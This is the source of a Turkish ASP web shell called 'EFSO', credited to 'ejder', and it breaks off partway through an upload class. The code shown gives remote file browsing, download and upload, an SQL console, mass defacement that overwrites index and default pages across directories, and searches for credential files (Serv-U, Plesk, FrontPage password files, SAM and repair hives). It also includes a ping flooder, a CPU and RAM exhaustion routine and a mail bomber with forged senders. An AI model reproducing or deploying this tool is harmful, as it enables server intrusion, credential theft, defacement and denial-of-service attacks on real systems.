?<%@ LANGUAGE = VBScript.Encode %> <%'ejder%> <% 'EFSO ejder & Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI ejder e Aitttir.--> 'TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa ejder & SaVSAK.CoM Sorunlu değildir.. 'Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. 'TAKLİTLEİRNDEN KAÇININ. by ejder 'ejder was HERE 'if request("abc") = "isko" then 'response.cookies("yes") = "1" 'response.cookies("yes").expires = now+352 'end if 'if not request.cookies("yes") = "1" then 'response.write "YEtkin yok..

by İskorpitx
" 'response.end() 'end if Server.ScriptTimeOut = 7200 Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\") FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1) FolderPath = Left(Fullpath,InStrRev(Fullpath,"\")) const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ" const karakter2="abcdefghijklmnopqrstuvwxyz" dkayit = "ejder Den kork, uzak dur. Kaşınma...

Bu Scriptin TUM haklari ejder e aitir. Uzerinde Oynama yasaktir.
by ejder
" dkayit2 = "by ejder

Bu Script i Kullanma Hakkin yok artik. YAsaklandi.. TÜrk server inda, com.tk, gov.tk gibi klaösr yada site var ise, direk algılandıüında otomatik , kullanımınıza izin vermemektedir. UNUTMA ki, ben bu Script i Türkiyemiz için,, yabancılara karşı kullanlım diye YAZdım.
by ejder
" const karakter3="0123456789" const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/" mail_array = array("yahoo","hotmail","mynet","gmail","hacker") 'özel mailler yaratmak için, SPAM dan kaçarımak için. Secueriy i aşmak için by ejder uzanti_array = array("com","net","biz","org","gov","br","info") yasak_array = array("ejder","SAVSAK","YAGMUR","BİRDEM","birdem","BIRDEM","FASTBOY","SAVSAK.COM","com.tk","gov.tk") msite = "SaVSaK.CoM" Dim FSO Set FSO = CreateObject("Scripting.FileSystemObject") konum = Trim(request("konum")) mode = request("mode") FolderPath2 = request("FolderPath2")&"\" islem = request("islem") del = request("del") file = request("file") folder = request("folder") table = Request("table") inject1 = Request("inject1") inject2 = Request("inject2") inject3 = Request("inject3") inject4 = Request("inject4") inject5 = Request("inject5") cmdkod = Request("cmdkod") hacked = request("hacked") Path = request("Path") url = request("url") count = request("count") size = request("size") dbname = request("dbname") dbkadi = request("dbkadi") dbsifre = request("dbsifre") ejdersql = request("ejdersql") sec = request("sec") Usermd5 = request("Usermd5") ara1 = request("ara1") ara2 = request("ara2") k1 = request("k1") k2 = request("k2") k3 = request("k3") k4 = request("k4") waiting = request("waiting") murl = "http://www." coding = request("coding") dizi = request("dizi") Usersmd5 = request("Usersmd5") salt = request("salt") hash2 = request("hash2") hash3 = request("hash3") hash4 = request("hash4") hash5 = request("hash5") hash6 = request("hash6") hash7 = request("hash7") hash8 = request("hash8") hash9 = request("hash9") hash10 = request("hash10") mad = "EFSO" if konum = "" then konum = FolderPath else FolderPath = konum end if if mode = "1" then FolderPath = request.form("remote") konum = request.form("remote") end if nolist = False popup = False if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24" or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then popup = True end if if mode = "6" then Response.Buffer=True Set Fil = FSO.GetFile(file) Response.contenttype="application/force-download" Response.AddHeader "Cache-control","private" Response.AddHeader "Content-Length", Fil.Size Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name Response.BinaryWrite readBinaryFile(Fil.path) Set f = Nothing: Set Fil = Nothing response.end end if if not mode = "okdir" then Call gelgit end if response.write "" %> <% sub KlasorOku on error resume next Set f = FSO.GetFolder(FolderPath) Set fc = f.SubFolders For Each f1 In fc 'If Instr(f1.Name, "com.tk") > 1 or Instr(f1.Name, "gov.tk") > 1 or Instr(f1.Name, "comtr") > 1 or Instr(f1.Name, "govtr") > 1 or Instr(f1.Name, "gov_tr") > 1 or Instr(f1.Name, "com_tr") > 1 or Instr(f1.Name, "savsakcom") > 1 or Instr(f1.Name, "savsak_com") > 1 or Instr(f1.Name, "savsak.com") > 1 Then 'Set textStreamObject = fso.OpenTextFile(Fullpath,2,true,false) 'textStreamObject.WriteLine(dkayit2) 'textStreamObject.Closenere 'Set textStreamObject = Nothing 'response.end() 'end if if FolderPath = "c:" or FolderPath = "C:" then Response.Write "
4 û 1"&f1.name&"
" else Response.Write "
4 û 1"&f1.name&"
" end if Response.Flush Next call hata end sub sub DosyaOku on error resume next Set f = FSO.GetFolder(FolderPath) Set fc = f.Files For Each f1 In fc dosyaAdi = f1.name num = InStrRev(dosyaAdi,".") uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num)) downStr = "ûÍ4?" response.Write "
" select case uzanti case "mdb" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" M "&downStr&"
" case "asp" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ± !"&downStr&"" case "jpg","gif" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ¢ "&downStr&"" case else Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" 2 !"&downStr&"" end select Next call hata end sub sub Suruculer for each drive_ in FSO.Drives Response.Write "" Response.Write "" if drive_.Drivetype=1 then Response.write "  < Disket Sürücü [" & drive_.DriveLetter & ":]   Ä" if drive_.Drivetype=2 then Response.write "  ; Sabit Disk [" & drive_.DriveLetter & ":]   Ä" if drive_.Drivetype=3 then Response.write "  ; Çıkarılabilir Disk [" & drive_.DriveLetter & ":]   Ä" if drive_.Drivetype=4 then Response.write "  ³ Cd-Rom [" & drive_.DriveLetter & ":]   Ä" Response.Write "" next Response.Write "  H Local Path " end sub Sub SurucuInfo 'Disk Alanını Gösterir - Created By FasTBoY ;) DriveSpace = Request("dspace") If Not DriveSpace = "" Then on error resume next Set driveObject = FSO.GetDrive(DriveSpace) D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4) if err <> 0 then response.write "

N Disk Hazır değil !!!! :( N
" else D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4) D3 = 100 D1a = 110 - D1 D2a = 110 - D2 D3a = 110 - D3 Response.Write "
Disk : " & driveObject.DriveLetter & "
 Boş AlanKullanılan AlanToplam Alan
 
 Yüzde :"&D1&" %"&D2&" %"&D3&" %
 Boyut : " & FormatNumber(driveObject.FreeSpace / 1048576) & " MB " & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB " & FormatNumber(driveObject.TotalSize / 1048576) & " MB" end if Set driveObject = Nothing End If end sub sub yetkino(str) response.write "   "&str&" : û   " End Sub sub yetkiyes(str) response.write "   "&str&" : ü   " end Sub sub Yetki on error resume next Set f = FSO.GetFolder(FolderPath) if err<>0 then yetkino("Okuma") yetkino("Yazma") yetkino("Silme") else yetkiyes("Okuma") on error resume next Set MyFile = FSO.CreateTextFile(FolderPath & "test.ejder", True) MyFile.write "ejder Was Here... =) Yazma - Okuma Testi için" set MyFile = Nothing if err<>0 then yetkino("Yazma") yetkino("Silme") else yetkiyes("Yazma") on error resume next FSO.DeleteFile FolderPath & "test.ejder",true if err<>0 then yetkino("Silme") else yetkiyes("Silme") end if end if end if set f = nothing end sub Sub olmadi(str) response.write "
N "&str&" :( N
" End Sub Sub oldu(str) response.write "
N "&str&" ;) Tebrikler.. by ejder N
" End Sub Sub tablo12(str) response.write ""&str&"" End Sub Sub tablo30(str) response.write ""&str&"" End Sub Sub tablo12L(str) response.write ""&str&"" End Sub Sub tablo12O(str) response.write ""&str&"" End Sub sub Hata if err<>0 then Response.Write "
Hata : "&err.Description&"
" end if end sub Function ReadBinaryFile(FileName) Const adTypeBinary = 1 Dim BinaryStream Set BinaryStream = CreateObject("ADODB.Stream") BinaryStream.Type = adTypeBinary BinaryStream.Open BinaryStream.LoadFromFile FileName ReadBinaryFile = BinaryStream.Read End Function Sub SQL_menu_by_ejder response.write "
" response.write "
" response.write "
" response.write "" tablo30(" SQL İnjection Merkezi") tablo30(" ") tablo12(" Kullanabilmeniz için SQL kouıtları bilmeniz gerek !!!
N Aksi Halde ASP DOsyaı Kitlenir. Cevap veremez. Server a Zarar verir. N
") tablo12(" Select ") tablo12(" Delete ") tablo12(" Insert ") tablo12(" Update ") tablo12(" Diğer ") tablo12("


") if ejdersql = "" then tablo12(" .... ::: Tablolara Geri Dön ::: ....
") else tablo12(" .... ::: Tablolara Geri Dön ::: ....
") end if response.write "

" response.write "
...:::::: SQL Komut Yardım - Kullanım Klavuzu by ejder ::::::...

" end sub Sub SQL_by_ejder(sqlkonum,sqlkomut) on error resume next Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = sqlkonum objConn.Open if err <> 0 then response.write "

N DataBase ile Bağlantınız Sağlanamadıı !!! by ejder :( N


" else on error resume next objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText if err <> 0 then response.write "

N SQL İnjection Komutunuzda HATA var. ( Biliyorsan KullanMA :) ) by ejder N


" else Response.Write "
" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" do while not objRcs.EOF Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" objRcs.MoveNext loop Response.Write "
   "&objRcs.Fields(i).Name&"   
"&Replace(objRcs.Fields(i).Value,"<","<")&" 

" end if end if end sub Sub MSSQL_by_ejder(sqlkonum,sqlkomut) on error resume next Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Open sqlkonum if err <> 0 then response.write "

N DataBase ile Bağlantınız Sağlanamadıı !!! by ejder :( N


" else on error resume next objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText if err <> 0 then response.write "

N SQL İnjection Komutunuzda HATA var. ( Biliyorsan KullanMA :) ) by ejder N


" else Response.Write "
" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" do while not objRcs.EOF Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" objRcs.MoveNext loop Response.Write "
   "&objRcs.Fields(i).Name&"   
"&objRcs.Fields(i).Value&" 

" end if end if end sub sub Tablolama() on error resume next if ejdersql = "" then if sec = "mssql" then ejdersql = "PROVIDER=SQLOLEDB;DATA SOURCE="&file&";UID="&dbkadi&";PWD="&dbsifre&";DATABASE="&dbname&"" else ejdersql = "Driver={MySQL ODBC 3.51 Driver};Server="&file&";Database="&dbname&";Uid="&dbkadi&";Pwd="&dbsifre&"" end if end if Set objConn = Server.CreateObject("ADODB.Connection") Set objADOX = Server.CreateObject("ADOX.Catalog") objConn.Open ejdersql objADOX.ActiveConnection = objConn if err = 0 then Response.Write "
Tablolar

" response.write "" For Each table in objADOX.Tables If table.Type = "TABLE" Then Response.Write "" End If Next response.write "
4 "&table.Name&"
" response.write "
" else Call MSSQL_Form yazortaa("

N Server ile bağlantı Sağlanamadı !!! girilen Değerler yanlış .. :( by ejder N

") end if end Sub sub MSSQL_Form() response.write "
" yazorta(" MY-MS SQL Server Conneciton 1.0 by ejder ") response.write "
MsSQL    -    MySQL
Server Adı & IP :
DB Adı :
KAdı :
Şifre :
" yazorta("TÜm hakları Saklıdır by ejder =)") response.write "
" end sub sub MassCopier(hedef) on error resume next Set cloner = fso.GetFile(hacked) cloner.Copy hedef,true Set cloner = Nothing end sub sub MassCreater(yer,savsak) on error resume next Set savsakcom = FSO.CreateTextFile(yer, True) savsakcom.write savsak Set savsakcom = Nothing end sub sub MassAttack2(yer,ej,svk) if hash3 = "ok" then yer = yer&"\"&svk end if on error resume next if not islem = "ozel" then if hash9 = "copy" then MassCopier(yer&"\index.html") MassCopier(yer&"\index.htm") MassCopier(yer&"\index.asp") MassCopier(yer&"\index.cfm") MassCopier(yer&"\index.php") MassCopier(yer&"\default.html") MassCopier(yer&"\default.htm") MassCopier(yer&"\default.asp") MassCopier(yer&"\default.cfm") MassCopier(yer&"\default.php") else Call MassCreater(yer&"\index.html",ej) Call MassCreater(yer&"\index.htm",ej) Call MassCreater(yer&"\index.asp",ej) Call MassCreater(yer&"\index.cfm",ej) Call MassCreater(yer&"\index.php",ej) Call MassCreater(yer&"\default.html",ej) Call MassCreater(yer&"\default.htm",ej) Call MassCreater(yer&"\default.asp",ej) Call MassCreater(yer&"\default.cfm",ej) Call MassCreater(yer&"\default.php",ej) end if else if hash9 ="copy" then MassCopier(yer&"\"&inject1) else Call MassCreater(yer&"\"&inject1,ej) end if end if a = Replace(FilePath&"?konum="&yer&"&Time="&time,"\","/") If Err.Number = 0 Then response.write "
"&yer&" OK !! ü
" else response.write "
"&yer&" Noo :( !! û
" end if Err.Number = 0 Response.Flush end sub sub MassAttack(yer,ej,svk) dim fastejder on error resume next Set f = FSO.GetFolder(yer) Set fc = f.SubFolders For Each f1 In fc if hash3 = "ok" then fastejder = f1.path&"\"&svk else fastejder = f1.path end if if not islem = "ozel" then if hash9 = "copy" then MassCopier(fastejder&"\index.html") MassCopier(fastejder&"\index.htm") MassCopier(fastejder&"\index.asp") MassCopier(fastejder&"\index.cfm") MassCopier(fastejder&"\index.php") MassCopier(fastejder&"\default.html") MassCopier(fastejder&"\default.htm") MassCopier(fastejder&"\default.asp") MassCopier(fastejder&"\default.cfm") MassCopier(fastejder&"\default.php") else Call MassCreater(fastejder&"\index.html",ej) Call MassCreater(fastejder&"\index.htm",ej) Call MassCreater(fastejder&"\index.asp",ej) Call MassCreater(fastejder&"\index.cfm",ej) Call MassCreater(fastejder&"\index.php",ej) Call MassCreater(fastejder&"\default.html",ej) Call MassCreater(fastejder&"\default.htm",ej) Call MassCreater(fastejder&"\default.asp",ej) Call MassCreater(fastejder&"\default.cfm",ej) Call MassCreater(fastejder&"\default.php",ej) end if else if hash9 = "copy" then MassCopier(fastejder&"\"&inject1) else Call MassCreater(fastejder&"\"&inject1,ej) end if end if a = Replace(FilePath&"?konum="&fastejder&"&Time="&time,"\","/") If Err.Number = 0 Then response.write "
"&fastejder&" OK !! ü
" else response.write "
"&fastejder&" Noo :( !! û
" end if Err.Number = 0 Response.Flush if islem = "brute" then Call MassAttack(f1.path&"\",ej,svk) end if Next end sub Sub tester(yer) on error resume next Set f = FSO.GetFolder(yer) Set fc = f.SubFolders For Each f1 In fc a = Replace(FilePath&"?konum="&f1.path&"&Time="&time,"\","/") response.write "
"&f1.path&" " Response.Flush Err.Number = 0 on error resume next Set f = FSO.GetFolder(f1.path) if Err.Number <> 0 then response.write " Oku : û " else response.write " Oku : ü " end if set f = nothing Err.Number = 0 Response.Flush on error resume next Set MyFile = FSO.CreateTextFile(f1.path & "test.ejder", True) MyFile.write " ejder Was Here... =) " set MyFile = Nothing if Err.Number <> 0 then response.write " Yaz : û " else response.write " Yaz : ü " end if set f = nothing Err.Number = 0 Response.Flush on error resume next FSO.DeleteFile f1.path & "test.ejder",true if Err.Number <> 0 then response.write " Sil : û " else response.write " Sil : ü " end if set f = nothing Err.Number = 0 Response.Flush response.write "
" Response.Flush Call tester(f1.path) Next end sub Sub arama(yer) on error resume next Set f = FSO.GetFolder(yer) Set fc = f.SubFolders For Each f1 In fc Set f2 = FSO.GetFolder(f1.path) Set fc2 = f2.Files For Each f12 In fc2 if InStr(Ucase(f12.name),Ucase(hacked)) > 0 then downStr = "
Í " if Ucase(hacked)="MDB" then Response.Write downStr&" û - "&f12.path&" ["&f12.size&"]"&"
" i=i+1 else Response.Write downStr&" û ! - "&f12.path&" ["&f12.size&"]"&"

" i=i+1 end if end if Response.Flush next set f2 = nothing set fc2 = nothing Call arama(f1.path) next set f = nothing set fc = nothing end sub Sub Ping_Bomb_ejder(ejdersite,ejderpings,ejdertimeout,ejderbyte) '/// by ejder. özel modüller ekledim =). Ne Mutlu TÜRKÜM DİYENE. noattack = 1 bonus = 0 If ejderpings = "" Then ejderpings = 4 If ejderpings = 0 Then ejderpings = 4 If ejdertimeout = "" Then ejdertimeout = 750 If InStr(ejdersite,"savsak") > 0 or InStr(ejdersite,"yagmurlu") or InStr(ejdersite,"com.tk") or InStr(ejdersite,"gov.tk") > 0 then noattack = 0 If InStr(ejdersite,"cyber") > 0 or InStr(ejdersite,"tahri") > 0 or InStr(ejdersite,"hack") > 0 or InStr(ejdersite,"team") > 0 then bonus = 1 response.write "" End Sub Sub Somurgen(filex,urlx) for i=0 to CInt(filex) response.write "
"&i&". Robot Bağlandı..
" response.Write "" next End Sub Sub Ram_Cpu on error resume next response.write "
RAM & CPU FUcker for SERVER by ejder =) 1.0
" response.write "

ZARAR verme MEkanizması Devrede...
" response.write "
Durdurmak için Pencereyi kapat. Her 2 Saniyede bir 3 program açılıyor...
" response.write "
by ejder
" response.Write "" response.Write "" response.Write "" response.write "" response.flush end Sub function TextYarat(intLen) str="" Randomize for i=1 to intLen str=str & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1) next TextYarat=str end function function MailSec() dim strNewText,i str="" Randomize mail = mail_array(round(rnd()*4)) uzanti = uzanti_array(round(rnd()*6)) str = "@"& mail &"."& uzanti MailSec = str end function function MailKorumasi(mailx) MailKorumasi = 0 for i=0 to 9 If Instr(UCASE(mailx), yasak_array(i)) > 0 Then MailKorumasi = 1 end if next end function Function MailYarat() MailYarat = TextYarat(8) & MailSec() end function Function TextYarat2() TextYarat2 = TextYarat(200) end function Function BaslikYarat() BaslikYarat = TextYarat(10) end function Sub MailBomber_by_ejder(alicix) response.cookies("bilesen") = "1" on error resume next Set mailObj = Server.CreateObject("CDONTS.NewMail") mailObj.From = MailYarat() mailObj.To = alicix mailObj.Subject = BaslikYarat() mailObj.Body = TextYarat2() mailObj.Send Set mailObj = Nothing if err <> 0 then on error resume next Set mailObj = Server.CreateObject("CDO.Message") mailObj.From = MailYarat() mailObj.To = alicix mailObj.Subject = BaslikYarat() mailObj.TextBody = TextYarat2() mailObj.Send Set mailObj = Nothing if err <> 0 then response.cookies("bilesen") = "0" end if end if End Sub Sub yazorta(yazx) response.write "
"&yazx&"
" End Sub Sub yazsol(yazx) response.write "
"&yazx&"
" End Sub Sub yazortaa(yazx) response.write "
"&yazx&"
" End Sub Sub yazsoll(yazx) response.write "
"&yazx&"
" End Sub Function OS() on error resume next strComputer = "." Set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set colItems = objWMI.ExecQuery("Select * from Win32_OperatingSystem",,48) For Each objItem in colItems VerBig = Left(objItem.Version,3) Next Select Case VerBig Case "5.0" OSystem = "W2K" Case "5.1" OSystem = "XP" Case "5.2" OSystem = "Windows 2003" Case "4.0" OSystem = "NT 4.0**" Case Else OSystem = "Unknown - probably Win 9x" End Select OS = OSystem End Function Sub FolderExistx(yer) if FSO.FolderExists(yer) then yazorta("4 û 1 "&yer&"") end if End Sub Sub ejderServuRemote() j=0 servu = array("C:\Program Files\base.ini","C:\base.ini","C:\Program Files\Serv-U\base.ini","C:\Program Files\Serv-U\ServUAdmin.ini","C:\Program Files\Serv-U\SERV-U.ini","C:\Program Files\Serv-U\ServUDaemon.ini","C:\Program Files\SERV-U.ini","C:\SERV-U.ini","C:\Program Files\ServUDaemon.ini","C:\ServUDaemon.ini","C:\Program Files\WS_FTP.ini","C:\WS_FTP.ini","C:\Program Files\WS_FTP\WS_FTP.ini","C:/Program Files/Gene6 FTP Server/RemoteAdmin/remote.ini","C:/users.txt","D:/users.txt","E:/users.txt") for i=0 to 16 if FSO.FileExists(servu(i)) then downStr = "ûÍ4?" yazorta(""&servu(i)&" ± !"&downStr&"") j=j+1 end if next if j = 0 then yazorta("
N Remote olarak Sonuç bulunamadı. Gelişmiş aramayı seçiniz. N ") end if servufolder = array("C:\Program Files\Serv-U","C:/Program Files/Gene6 FTP Server/RemoteAdmin","C:/Program Files/Gene6 FTP Server/Accounts/Helm FTP Users/users") for i=0 to 2 FolderExistx(servufolder(i)) next End Sub Sub ejderPleskRemote() j=0 plesk = array("c:/Program Files/SWsoft/Plesk/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk","c:/Program Files/SWsoft/Plesk/MySQL/Data/psa","c:/Program Files/SWsoft/Plesk/Databases/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk/Mail Servers\Mail Enable\Config","c:\Program Files\swsoft\autsav.sav") for i=0 to 3 if FSO.FolderExists(plesk(i)) then yazorta("4 û 1"&plesk(i)&"") j=j+1 end if next if j = 0 then yazorta("
N "&plesk(0)&" ve "&plesk(1)&" dizinleri bulunamadı. N ") end if if FSO.FileExists(plesk(4)) then downStr = "ûÍ4?" yazorta(""&servu(i)&" ± !"&downStr&"") else yazorta("
N Plesk'in Autsav.sav Dosyası bulunamadı. N ") end if End Sub Sub ejderSam() Err.Number=0 on error resume next Set MyFile = FSO.CreateTextFile("C:config\test.ejder", True) MyFile.write " ejder Was Here... =) " set MyFile = Nothing if Err.Number <> 0 then response.write "
 Yaz : û " else response.write "
 Yaz : ü " end if Err.Number=0 on error resume next FSO.DeleteFile "C:config\test.ejder",true if Err.Number <> 0 then response.write " Sil : û 
" else response.write " Sil : ü 
" end if on error resume next url = "C:config\" Set f = FSO.GetFolder(url) if err <> 0 then url = "C:\WINDOWS\system32\config\" Set f = FSO.GetFolder(url) end if Set fc = f.Files For Each f1 In fc downStr = "ûÍ4?" yazorta(""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ± !"&downStr&"") Next end Sub Sub ejderVti_Pvt() j=0 local = request.servervariables("APPL_PHYSICAL_PATH") vti = array(""&local&"\_vti_pvt\access.cnf",""&local&"\..\_vti_pvt\access.cnf",""&local&"\..\..\_vti_pvt\access.cnf",""&local&"\..\..\..\_vti_pvt\access.cnf",""&local&"\_vti_pvt\postinfo.html",""&local&"\..\_vti_pvt\postinfo.html",""&local&"\..\..\_vti_pvt\postinfo.html",""&local&"\..\..\..\_vti_pvt\postinfo.html",""&local&"\vti_pvt/service.pwd",""&local&"\..\vti_pvt/service.pwd",""&local&"\..\..\vti_pvt/service.pwd",""&local&"\..\..\..\vti_pvt/service.pwd",""&local&"/vti_pvt/users.pwd",""&local&"/../vti_pvt/users.pwd",""&local&"/../../vti_pvt/users.pwd",""&local&"/../../../vti_pvt/users.pwd",""&local&"/vti_pvt/authors.pwd",""&local&"/../vti_pvt/authors.pwd",""&local&"/../../vti_pvt/authors.pwd",""&local&"/../../../vti_pvt/authors.pwd") for i=0 to 19 if FSO.FileExists(vti(i)) then downStr = "ûÍ4?" yazorta(""&vti(i)&" ± !"&downStr&"") j=j+1 end if next if j = 0 then yazorta("
N Sonuç bulunamadı. Daha geniş Arama yapın by ejder N ") end if end sub Sub ejderNTUser(oturum) j=0 ntuser = array("c:\documents and settings\"&oturum&"\NTUSER.DAT","c:\documents and settings\Administrator\NTUSER.DAT","c:\documents and settings\"&oturum&"\ntuser.dat.log","c:\documents and settings\Administrator\ntuser.dat.log","c:\documents and settings\"&oturum&"\ntuser.ini","c:\documents and settings\Administrator\ntuser.ini") for i=0 to 5 if FSO.FileExists(ntuser(i)) then downStr = "ûÍ4?" yazorta(""&ntuser(i)&" ± !"&downStr&"") j=j+1 end if next if j = 0 then yazorta("
N Sonuç bulunamadı. Daha geniş Arama yapın by ejder N ") end if end sub Sub ejderRepair() Err.Number=0 on error resume next Set MyFile = FSO.CreateTextFile("c:..\repair\test.ejder", True) MyFile.write " ejder Was Here... =) " set MyFile = Nothing if Err.Number <> 0 then response.write "
 Yaz : û " else response.write "
 Yaz : ü " end if Err.Number=0 on error resume next FSO.DeleteFile "c:..\repair\test.ejder",true if Err.Number <> 0 then response.write " Sil : û 
" else response.write " Sil : ü 
" end if on error resume next url = "c:..\repair\" Set f = FSO.GetFolder(url) if err <> 0 then url = "C:\WINDOWS\repair\" Set f = FSO.GetFolder(url) end if Set fc = f.Files For Each f1 In fc downStr = "ûÍ4?" yazorta(""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" ± !"&downStr&"") Next end Sub Function kodolustur(aralik) ' belirtitiim aralıkda kod oluştuuyorurum. 01#01#01#01# başlangıç iiçin by ejder dim coding coding = "" for i=1 to CInt(aralik) coding = coding + "01#" next kodolustur = coding End Function Function diziolustur() ' Seçilen Charset leri burda birleştiriyorum by ejder Dim dizi dizi="" if not k1 = "" then dizi = dizi & karakter1 if not k2 = "" then dizi = dizi & karakter2 if not k3 = "" then dizi = dizi & karakter3 if not k4 = "" then dizi = dizi & karakter4 diziolustur = dizi End Function Function Sifreyarat(codex,aralik,dizix) ' Stirng kodunu sağdan çözümleyerek Şifre yaratıyor by Ej;DER dim hash dim sifre hash="" sifre="" i=CInt(aralik) Do While i>0 hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Sağdan sayıları alıyor. sifre = Mid(dizix,hash,1) & sifre i=i-1 Loop Sifreyarat = sifre End Function Function SonrakiAdim(codex,aralik,dizix) ' sonraki adıma hazırlık coded by ejder ;) Dim hash hash = "" increment=0 goup=0 hashing = "" i=CInt(aralik) Do While i>0 hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Sağdan sayıları alıyor. ' Carry out ı diğeirne giriş yap increment the next one if hash => Len(dizix) then increment = 1 hash = 1 else if increment = 1 then hash = hash+1 increment = 0 end if end if ' eğer ara1 hanelki şifreleme bitti ise diğeirne ıkamsı gerek ara1++ if i = 1 AND hash>= Len(dizix)-1 then goup=1 ' Brute bitişini gösteriiyorum. if i = CInt(aralik) AND hash>= Len(dizix) AND ara1 = ara2 then getend=1 ''' BRUTE çıkışı bittiğini analıyorumm GETEND =1 !!!!!!!!!!!!! ' hash i bir sonraki adıma hazırla if i = CInt(aralik) then hash = hash + 1 'yeni hash numarası oluştur if hash <10 then hash = "0" & hash hashing = hash &"#" & hashing i=i-1 Loop coding = hashing ' eğerki goup =1 then hane atla ve yeni stireg olşutur if goup = 1 then coding = "" ara1 = CInt(aralik) + 1 for j=1 to ara1 coding = coding + "01#" next end if SonrakiAdim = coding End Function Sub Cookyaz(str1,str2,str3) if not str3 = "" then response.cookies(str1)("str2") = str3 response.cookies(str1).expires = now+100 session("say") = CInt(session("say")) + 1 end if End Sub Sub HashFounded(str1,str2) if not request.cookies(str1)("sifre") = "" then yazsol("Bulundu: "&request.cookies(str1)(str2)&" ->> "&request.cookies(str1)("sifre")&" ") inject3 = CInt(inject3) + 1 end if End Sub Sub hashyes(str1,str2,md5x,pwd) if not request.cookies(str1)(str2) = "" AND UCASE(request.cookies(str1)(str2)) = md5x then yazsol("BULDUuuuuuuuuuuuuuuu " & pwd & " - " & request.cookies(str1)(str2)&"") response.cookies(str1)("sifre") = pwd end if End Sub Sub gelgit response.Write "" End sub '************************* ZORUNLU UPLOAD için GEREKLi =(( ********************************************************************************************** Class clsUpload Private mbinData Private mlngChunkIndex Private mlngBytesReceived Private mstrDelimiter Private CR Private LF Private CRLF Private mobjFieldAry() Private mlngCount Private Sub RequestData Dim llngLength mlngBytesReceived = Request.TotalBytes mbinData = Request.BinaryRead(mlngBytesReceived) End Sub Private Sub ParseDelimiter() mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1) End Sub Private Sub ParseData() Dim llngStart Dim llngLength Dim llngEnd Dim lbinChunk llngStart = 1 llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF) While Not llngStart = 0 llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2 llngLength = llngEnd - llngStart lbinChunk = MidB(mbinData, llngStart, llngLength) Call ParseChunk(lbinChunk) llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF) Wend End Sub Private Sub ParseChunk(ByRef pbinChunk) Dim lstrName Dim lstrFileName Dim lstrContentType Dim lbinData Dim lstrDisposition Dim lstrValue lstrDisposition = ParseDisposition(pbinChunk) lstrName = ParseName(lstrDisposition) lstrFileName = ParseFileName(lstrDisposition) lstrContentType = ParseContentType(pbinChunk) If lstrContentType = "" Then lstrValue = CStrU(ParseBinaryData(pbinChunk)) Else lbinData = ParseBinaryData(pbinChunk) End If Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData) End Sub Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData) Dim lobjField ReDim Preserve mobjFieldAry(mlngCount) Set lobjField = New clsField lobjField.Name = pstrName lobjField.FilePath = pstrFileName lobjField.ContentType = pstrContentType If LenB(pbinData) = 0 Then lobjField.BinaryData = ChrB(0) lobjField.Value = pstrValue lobjField.Length = Len(pstrValue) Else lobjField.BinaryData = pbinData lobjField.Length = LenB(pbinData) lobjField.Value = "" End If Set mobjFieldAry(mlngCount) = lobjField mlngCount = mlngCount + 1 End Sub Private Function ParseBinaryData(ByRef pbinChunk) Dim llngStart llngStart = InStrB(1, pbinChunk, CRLF & CRLF) If llngStart = 0 Then Exit Function llngStart = llngStart + 4 ParseBinaryData = MidB(pbinChunk, llngStart) End Function Private Function ParseContentType(ByRef pbinChunk) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStrB(1, pbinChunk, CRLF & 